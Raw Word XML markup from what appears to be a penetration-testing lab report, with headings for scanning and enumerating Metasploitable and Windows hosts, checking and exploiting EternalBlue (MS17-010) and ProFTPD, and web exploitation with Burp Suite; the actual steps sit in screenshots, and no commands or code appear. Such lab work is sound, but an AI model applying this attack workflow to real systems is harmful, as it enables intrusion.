          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Server:</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="56EA3E3C" wp14:editId="73625B9C">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23"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17"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A"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Scan OWASP:</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1F616B61" wp14:editId="77613DE1">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45" name="image50.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image50.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3327400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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lastRenderedPageBreak/>
        <w:t>Scan Windows 7:</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="688FD22D" wp14:editId="707F08D9">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="53" name="image53.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image53.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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Scan Windows Server:</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="54835A60" wp14:editId="4E2F044B">
            <wp:extent cx="5943600" cy="3340100"/>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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> View Scan Results in Database</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7CC48EE7" wp14:editId="1BAB3612">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42" name="image46.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image46.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="124617A6" wp14:editId="2605FD3E">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50" name="image44.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image44.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3327400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4ED1075E" wp14:editId="441484CE">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6"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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A"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SMB Enumeration (Windows Targets)</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Scan for SMB vulnerabilities:</w:t>
      </w:r>
      <w:r w:rsidR="00FD722A" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FD722A" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FD722A" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FD722A" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability (MS17-010)</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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="62379CA3" wp14:editId="0A811633">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9"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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Enumerate SMB shares:</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="153D551B" wp14:editId="6CF6B796">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55" name="image47.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image47.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4FEDD9F8" wp14:editId="72CFEF42">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="image38.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image38.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Enumerate SMB users:</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2E1AB3F5" wp14:editId="517696F1">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28"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27"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A"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lastRenderedPageBreak/>
        <w:t>Step 2.6: HTTP/Web Server Enumeration</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Banner Grabbing:</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4D898CB1" wp14:editId="30E746C8">
            <wp:extent cx="5943600" cy="3365500"/>
            <wp:effectExtent l="0" t="0" r="0" b="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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Directory Enumeration:</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="33933063" wp14:editId="30B4159D">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="48" name="image52.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image52.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A"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lastRenderedPageBreak/>
        <w:t>SSH Enumeration</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="07AE051A" wp14:editId="3A065A7D">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27"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30"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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FTP Enumeration</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="20CA2F0D" wp14:editId="077BBDB3">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38" name="image40.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image40.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">PHASE 3: </w:t>
      </w:r>
      <w:r w:rsidR="00A13DDC" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>INITIAL ACCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Days 3-4)</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 xml:space="preserve">Exploiting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ProFTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="31292371" wp14:editId="12416E5C">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21"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32"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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 xml:space="preserve">Exploit Windows 7 with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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If Windows 7 is vulnerable to MS17-010:</w:t>
      </w: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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="73337DC2" wp14:editId="196C807A">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41" name="image43.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image43.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00473DE1" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PHASE 4: </w:t>
      </w:r>
      <w:r w:rsidR="00A13DDC" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WEB EXPLOITATION WITH BURP SUITE (Days 5-6)</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Start Burp Suite</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="72898BAE" wp14:editId="21C0775E">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54"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34"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
